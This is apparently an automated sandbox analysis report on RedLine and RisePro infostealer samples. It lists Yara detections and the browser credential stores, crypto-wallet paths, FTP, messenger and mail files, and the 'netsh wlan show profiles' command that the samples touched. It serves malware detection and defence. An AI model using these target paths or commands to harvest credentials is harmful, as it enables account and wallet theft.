                              Source: Yara matchFile source: Process Memory Space: MPGPH131.exe PID: 3436, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: c884f8452a.exe PID: 7988, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: RageMP131.exe PID: 1864, type: MEMORYSTR
                              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\L6h0MKsU674R9uRTEifr_26.zip, type: DROPPED
                              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\lGaQRZaI9ZBmSkbqM2Ghh6s.zip, type: DROPPED
                              Found many strings related to Crypto-Wallets (likely being stolen)
                              Source: c884f8452a.exe, 00000014.00000002.3272062949.00000000016AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
                              Source: MPGPH131.exe, 0000001C.00000002.3251490227.0000000007CA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\ElectronCash\wallets
                              Source: c884f8452a.exe, 00000014.00000002.3272062949.00000000016AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\com.liberty.jaxx
                              Source: c884f8452a.exe, 00000014.00000002.3272062949.00000000016AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                              Source: c884f8452a.exe, 00000014.00000002.3272062949.00000000016AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\Ethereum\wallets
                              Source: c884f8452a.exe, 00000014.00000002.3272062949.00000000016AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                              Source: MPGPH131.exe, 0000001C.00000002.3245487291.00000000013F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\Binance\app-store.json
                              Source: c884f8452a.exe, 00000014.00000002.3272062949.00000000016AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\Ethereum\wallets
                              Source: c884f8452a.exe, 00000014.00000002.3272062949.00000000016AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                              Source: c884f8452a.exe, 00000014.00000002.3272062949.00000000016AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\MultiDoge\multidoge.wallet
                              Source: powershell.exe, 0000000B.00000002.2827936126.00007FF848E80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: sqlcolumnencryptionkeystoreprovider
                              Source: MPGPH131.exe, 0000001C.00000002.3251490227.0000000007C9B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\Ledger Live
                              Tries to harvest and steal WLAN passwords
                              Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
                              Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profilesJump to behavior
                              Tries to harvest and steal browser information (history, passwords, etc)
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yiaxs5ej.default\formhistory.sqlite
                              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login Data
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\CURRENT
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\kncchdigobghenbbaddojjnnaogfppfj\CURRENT
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm\CURRENT
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm\CURRENT
                              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Orbitum\User Data\Default\Login Data
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai\CURRENT
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai\CURRENT
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi\CURRENT
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\blnieiiffboillknjnepogjhkgnoapac\CURRENT
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
                              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\logins.json
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\IndexedDB\chrome-extension_cjelfplplebdjjenllpjcblmjkfcffne_0.indexeddb.leveldb\CURRENT
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yiaxs5ej.default\signons.sqlite
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn\CURRENT
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig\CURRENT
                              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.json
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj\CURRENT
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk\CURRENT
                              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\CentBrowser\User Data\Default\Login Data
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih\CURRENT
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne\CURRENT
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad\CURRENT
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqlite
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao\CURRENT
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln\CURRENT
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec\CURRENT
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj\CURRENT
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec\CURRENT
                              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\CocCoc\Browser\User Data\Default\Login Data
                              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Vivaldi\User Data\Default\Login Data
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad\CURRENT
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln\CURRENT
                              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Chromium\User Data\Default\Login Data
                              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Chedot\User Data\Default\Login Data
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao\CURRENT
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yiaxs5ej.default\places.sqlite
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\signons.sqlite
                              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Comodo\Dragon\User Data\Default\Login Data
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj\CURRENT
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac\CURRENT
                              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yiaxs5ej.default\logins.json
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi\CURRENT
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne\CURRENT
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\IndexedDB\chrome-extension_blnieiiffboillknjnepogjhkgnoapac_0.indexeddb.leveldb\CURRENT
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\CURRENT
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk\CURRENT
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig\CURRENT
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih\CURRENT
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\kpfopkelmapcoipemfendmdcghnegimn\CURRENT
                              Tries to harvest and steal ftp login credentials
                              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\sitemanager.xml
                              Tries to steal Crypto Currency Wallets
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeFile opened: C:\Users\user\AppData\Roaming\atomic\
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeFile opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeFile opened: C:\Users\user\AppData\Roaming\atomic\
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeFile opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\
                              Tries to steal Instant Messenger accounts or passwords
                              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\.purple\accounts.xmlJump to behavior
                              Source: C:\Windows\System32\rundll32.exeFile opened: C:\.purple\accounts.xmlJump to behavior
                              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\System32\.purple\accounts.xmlJump to behavior
                              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\.purple\accounts.xmlJump to behavior
                              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\.purple\accounts.xmlJump to behavior
                              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\.purple\accounts.xmlJump to behavior
                              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\.purple\accounts.xmlJump to behavior
                              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\ImmersiveControlPanel\.purple\accounts.xmlJump to behavior
                              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\.purple\accounts.xmlJump to behavior
                              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\.purple\accounts.xmlJump to behavior
                              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\SysWOW64\.purple\accounts.xmlJump to behavior
                              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Program Files (x86)\rjKMaHWEjHxrAXnmaImAvrxNrHOchwuelXkCKuIwTZIWy\.purple\accounts.xmlJump to behavior
                              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Temp\09fd851a4f\.purple\accounts.xmlJump to behavior
                              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\.purple\accounts.xml
                              Source: C:\Windows\System32\rundll32.exeFile opened: C:\.purple\accounts.xml
                              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\System32\.purple\accounts.xml
                              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\.purple\accounts.xml
                              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\.purple\accounts.xml
                              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\.purple\accounts.xml
                              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\.purple\accounts.xml
                              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\ImmersiveControlPanel\.purple\accounts.xml
                              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\.purple\accounts.xml
                              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\.purple\accounts.xml
                              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\SysWOW64\.purple\accounts.xml
                              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Program Files (x86)\rjKMaHWEjHxrAXnmaImAvrxNrHOchwuelXkCKuIwTZIWy\.purple\accounts.xml
                              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Temp\09fd851a4f\.purple\accounts.xml
                              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Program Files\Google\Chrome\Application\.purple\accounts.xml
                              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Temp\1000055001\.purple\accounts.xml
                              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Temp\4d0ab15804\.purple\accounts.xml
                              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Temp\1000056001\.purple\accounts.xml
                              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Temp\1000187001\.purple\accounts.xml
                              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Temp\1000188001\.purple\accounts.xml
                              Tries to steal Mail credentials (via file / registry access)
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                              Source: 831840b410.exe, 00000010.00000003.3096661505.0000000001061000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WIN_XP`
                              Source: 831840b410.exe, 0000002F.00000003.3472622791.000000000192C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WIN_XP
                              Source: 831840b410.exe, 0000002F.00000000.3200529574.0000000000D62000.00000002.00000001.01000000.00000011.sdmpBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
                              Source: 831840b410.exe, 0000001F.00000003.3233691066.0000000001849000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WIN_XPo/
                              Source: Yara matchFile source: 52.0.build12.exe.3c0000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0000001D.00000002.3253650821.00000000012A1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000001C.00000002.3245487291.00000000013F7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000034.00000000.3328661632.00000000003C2000.00000002.00000001.01000000.00000018.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000014.00000002.3272062949.00000000016CC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: c884f8452a.exe PID: 5596, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: MPGPH131.exe PID: 4012, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: MPGPH131.exe PID: 3436, type: MEMORYSTR
                              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\build12[1].exe, type: DROPPED
                              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe, type: DROPPED

                              Remote Access Functionality

                              barindex
                              Yara detected RedLine Stealer
                              Source: Yara matchFile source: dump.pcap, type: PCAP
                              Source: Yara matchFile source: 52.0.build12.exe.3c0000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000034.00000000.3328661632.00000000003C2000.00000002.00000001.01000000.00000018.sdmp, type: MEMORY
                              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\build12[1].exe, type: DROPPED
                              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe, type: DROPPED
                              Yara detected RisePro Stealer
                              Source: Yara matchFile source: 0000001C.00000003.2928548272.0000000004FB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000001D.00000002.3261208378.0000000007DEF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000002D.00000003.3127053365.0000000005330000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000033.00000002.3372562116.0000000000AA1000.00000040.00000001.01000000.00000014.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000001D.00000003.3072924932.0000000007DEF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000024.00000003.3049065543.00000000048F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000001D.00000002.3252023529.0000000000891000.00000040.00000001.01000000.00000015.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000002D.00000002.3204405230.0000000000371000.00000040.00000001.01000000.00000017.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000001D.00000003.3071931619.0000000007DEA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000014.00000003.2883884113.0000000005380000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000014.00000002.3269708121.0000000000AA1000.00000040.00000001.01000000.00000014.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000033.00000003.3293720784.0000000004F20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000001D.00000002.3260532533.0000000007940000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000001D.00000003.3072820312.0000000007DEC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000014.00000003.2990613852.0000000007EE5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000024.00000002.3145142996.0000000000AA1000.00000040.00000001.01000000.00000014.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000014.00000002.3280096095.0000000007EE5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
